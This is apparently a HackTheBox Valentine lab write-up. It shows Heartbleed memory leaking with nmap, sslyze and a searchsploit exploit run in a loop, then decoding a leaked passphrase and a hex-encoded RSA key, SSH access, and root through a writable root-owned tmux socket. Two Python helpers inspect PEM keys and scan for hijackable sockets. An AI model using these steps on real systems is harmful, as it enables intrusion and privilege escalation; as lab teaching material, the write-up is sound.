We used the HackTheBox Valentine machine to demonstrate the Heartbleed vulnerability and privilege escalation through the tmux terminal multiplexer. Valentine is a unique medium-difficulty machine built around Heartbleed, a bug that had a devastating impact on systems across the globe.
Heartbleed Vulnerability Exploitation
My initial step was to exploit the Heartbleed vulnerability.
- The machine was running a version of OpenSSL that still had the Heartbleed bug (CVE-2014-0160).
- A TLS heartbeat request carries a small payload plus a field stating how long that payload is. Vulnerable OpenSSL trusted the stated length without comparing it to what actually arrived, so a request that claims up to 64 KB of payload but sends almost none makes the server copy that many bytes of its own process memory into the reply. Every reply leaks a different slice of memory, which can contain session data, credentials and anything else the web server recently handled.
- By repeating the request, I found a Base64 encoded string in the leaked memory.
- Decoding that string gave me the passphrase protecting an RSA private key.
- I explored several ways to test for and exploit Heartbleed:
- Using the Nmap script:
nmap --script ssl-heartbleed <target_ip> -p 443
- Using sslscan or sslyze, both of which include a Heartbleed check:
sslyze --heartbleed <target_ip>
- Using a Python exploit script that I found via searchsploit. I ran it like this:
python heartbleed.py 10.10.10.79
- Because each reply leaks something different, I wrapped the exploit in a Bash for loop and piped the hexdump output through grep -v "00000000" to drop the lines that consist of nothing but null bytes, leaving only the lines with recoverable content.
- Once I had the Base64 string, I decoded it using:
echo "<base64_string>" | base64 -d
Directory Brute-forcing and RSA Key Discovery
After obtaining the password, my next step was to find the RSA private key.
- I brute-forced directories with gobuster. My command looked like this:
sudo gobuster dir -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
- This revealed a directory named /dev/, which contained a file called hype.key whose content was a hex dump rather than a readable key.
- I downloaded the file with wget, skipping certificate validation because the box's HTTPS certificate is not one wget trusts:
wget https://<target_ip>/dev/hype.key --no-check-certificate
- To turn the hex dump back into an ASCII RSA private key, I reversed it with xxd:
cat hype.key | xxd -r -p > rsa_encrypted
- A quick check that the decode worked: the output should begin with -----BEGIN RSA PRIVATE KEY----- and carry a Proc-Type: 4,ENCRYPTED header, which is what tells you the passphrase recovered via Heartbleed is needed before the key can be used.
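The decode-and-check step above, as an added example that is not code from the write-up: it does what `xxd -r -p` did and then reads the PEM envelope so you know, before calling openssl, whether the key is passphrase-protected, which cipher wraps it, and whether the Base64 body survived the hex round trip intact. The sample PEM embedded at the bottom is constructed for the demo (its body is a five-byte DER SEQUENCE, not a real key); the script assumes the input is a plain hex dump as written by `xxd -p`.

```python
import base64
import binascii
import re
import sys

# BEGIN/END envelope with matching labels; headers (if any) sit between BEGIN and a blank line.
PEM_RE = re.compile(rb"-----BEGIN (?P<label>[A-Z ]+)-----\r?\n(?P<inner>.*?)-----END (?P=label)-----", re.S)

def hex_dump_to_bytes(text):
    """Undo a plain hex dump (what xxd -p writes); line breaks and spaces are ignored."""
    if isinstance(text, bytes):
        text = text.decode("ascii")
    return bytes.fromhex(text)

def inspect_pem(pem):
    """Describe the first PEM block: label, whether it is passphrase-protected, cipher/IV, DER length.

    Returns None when there is no well-formed envelope or the body is not valid Base64,
    i.e. when the hex decode went wrong somewhere.
    """
    m = PEM_RE.search(pem)
    if not m:
        return None
    headers, body = {}, []
    for line in m.group("inner").splitlines():
        line = line.strip()
        if not line:
            continue
        if b":" in line and not body:            # RFC 1421 headers come before the body
            key, value = line.split(b":", 1)
            headers[key.strip().decode()] = value.strip().decode()
        else:
            body.append(line)
    try:
        der = base64.b64decode(b"".join(body), validate=True)
    except binascii.Error:
        return None
    cipher, _, iv = headers.get("DEK-Info", "").partition(",")
    return {
        "label": m.group("label").decode(),
        "encrypted": headers.get("Proc-Type", "").endswith("ENCRYPTED"),
        "cipher": cipher or None,
        "iv_hex": iv or None,
        "der_len": len(der),
    }

# Constructed sample: the hex dump of a PEM envelope whose body is a five-byte DER
# SEQUENCE, not a real key; the headers are what openssl writes for a traditional
# passphrase-protected RSA key.
SAMPLE_PEM = (b"-----BEGIN RSA PRIVATE KEY-----\n"
              b"Proc-Type: 4,ENCRYPTED\n"
              b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
              + base64.b64encode(b"\x30\x03\x02\x01\x00")
              + b"\n-----END RSA PRIVATE KEY-----\n")
SAMPLE_HEX_DUMP = "\n".join(SAMPLE_PEM.hex()[i:i + 60] for i in range(0, len(SAMPLE_PEM.hex()), 60))

if __name__ == "__main__":
    # usage: python inspect_key.py hype.key [rsa_encrypted]   (no arguments: run on the sample)
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_HEX_DUMP.encode()
    pem = hex_dump_to_bytes(raw)
    info = inspect_pem(pem)
    print(info or "decode failed: not a well-formed PEM block")
    if info and info["encrypted"]:
        print("passphrase-protected (%s): openssl rsa -in <file> -out <plain> will prompt for it" % info["cipher"])
    if len(sys.argv) > 2:
        open(sys.argv[2], "wb").write(pem)
```

A None result means the hex dump was truncated or corrupted in transit, which is worth knowing before spending time on passphrases; an "encrypted": False result means openssl will not prompt at all and the key can go straight to ssh.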
SSH Access
With the encrypted RSA key and its password, I could finally gain SSH access.
- I stripped the passphrase from the key with OpenSSL, entering the password recovered via Heartbleed at the prompt:
openssl rsa -in rsa_encrypted -out rsa_decrypted
- ssh refuses a private key that other users can read, so the decrypted file's permissions must be restricted to the owner (mode 600) before it is used.
- Then I used the decrypted private key to log in via SSH as the user "hype":
ssh -i rsa_decrypted hype@10.10.10.79
- Once logged in, I quickly checked the system information with:
uname -a
Privilege Escalation via Tmux
Now that I had a user shell, my focus shifted to privilege escalation.
- I investigated running processes with:
ps aux | grep tmux
This showed a tmux server running as root that had been started with a custom socket path, /dev/dev_session.
- I checked the permissions of that socket with:
ls -la /dev/
and found that the "hype" user had write access to it.
- A tmux client does nothing more than talk to a server over its socket, and the server, which spawns every shell, was running as root. So opening a session through that socket handed me a root shell. The command I used was:
tmux -S /dev/dev_session
- From there, I moved to the root directory with cd /root and read the root.txt flag with cat root.txt.
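The write-up found the socket by reading ls -la by eye. The following is an added example (mine, not from the write-up or from tmux) that automates that check: it walks a few directories, keeps only Unix sockets owned by another user, and evaluates the mode bits itself rather than calling os.access(), so the same logic can be asked "would uid X with groups Y be able to write this?" and can be exercised without actually being a second user. The directory list is an assumption about where sockets usually live; the fixture socket is constructed for the demo.

```python
import os
import socket
import stat
import sys
import tempfile

DEFAULT_DIRS = ("/tmp", "/dev", "/run", "/var/run")   # assumption: where sockets usually live

def socket_writable_by(st, uid, gids):
    """Unix permission check done by hand: is the socket described by st writable by uid?

    Owner bits apply if uid owns it, else group bits if its gid is one of ours,
    else the 'other' bits. Non-sockets never qualify.
    """
    if not stat.S_ISSOCK(st.st_mode):
        return False
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def find_hijackable_sockets(dirs, uid=None, gids=None):
    """Sockets under dirs owned by someone else yet writable by us: [(path, owner_uid, mode_string)]."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) | {os.getgid()} if gids is None else set(gids)
    hits = []
    for d in dirs:
        for root, _, names in os.walk(d):
            for name in names:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)            # lstat: never follow symlinks
                except OSError:
                    continue
                if st.st_uid != uid and socket_writable_by(st, uid, gids):
                    hits.append((path, st.st_uid, stat.filemode(st.st_mode)))
    return hits

def demo_fixture():
    """Constructed fixture: a temp dir holding one group-writable socket, like the one on the box."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, "dev_session")
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(path)
    s.close()
    os.chmod(path, 0o660)
    return d, path, os.lstat(path)

if __name__ == "__main__":
    for path, owner, mode in find_hijackable_sockets(sys.argv[1:] or DEFAULT_DIRS):
        print("%s  owner=%d  %s  -> try: tmux -S %s" % (path, owner, mode, path))
```

A hit only matters if the process listening on the socket runs with more privilege than you and will spawn shells on request, which is exactly what a root-owned tmux server does; the same scan is also a useful hardening check, since the fix is simply to create the socket with a mode that denies group and other write.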
Technical Commands I Used:
Here’s a comprehensive list of the commands I used or referenced during the walkthrough:
- Nmap:
nmap <target_ip>
nmap --script ssl-heartbleed <target_ip> -p 443
- SSLScan (or SSLyze):
sslyze --heartbleed <target_ip>
- SearchSploit:
searchsploit heartbleed
searchsploit -m <exploit_path>
- Python (for running exploits):
python <exploit_script.py> <target_ip>
python heartbleed.py 10.10.10.79
- Grep:
grep -v "00000000"
- Bash For Loop:
for i in $(seq 1 100); do python <exploit.py> <target_ip> | grep -v "00000000" > output$i; done
- Echo and Base64:
echo "<base64_string>" | base64 -d
- GoBuster:
sudo gobuster dir -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
- Wget:
wget https://<target_ip>/dev/hype.key --no-check-certificate
- Cat:
cat hype.key
- xxd:
cat hype.key | xxd -r -p
cat hype.key | xxd -r -p > rsa_encrypted
- OpenSSL:
openssl rsa -in rsa_encrypted -out rsa_decrypted
- SSH:
ssh -i rsa_decrypted hype@10.10.10.79
- uname:
uname -a
- ps:
ps aux | grep tmux
- ls:
ls -la /dev/
- Tmux:
tmux -S /dev/dev_session
- cd:
cd /root
- cat (for flag):
cat root.txt
- Curl (seen in the root flag content):
curl -i -X POST -A "..." http://<target_ip>/decode.php --cookie "..." --data-binary "text=..." -o /dev/null
Video Walkthrough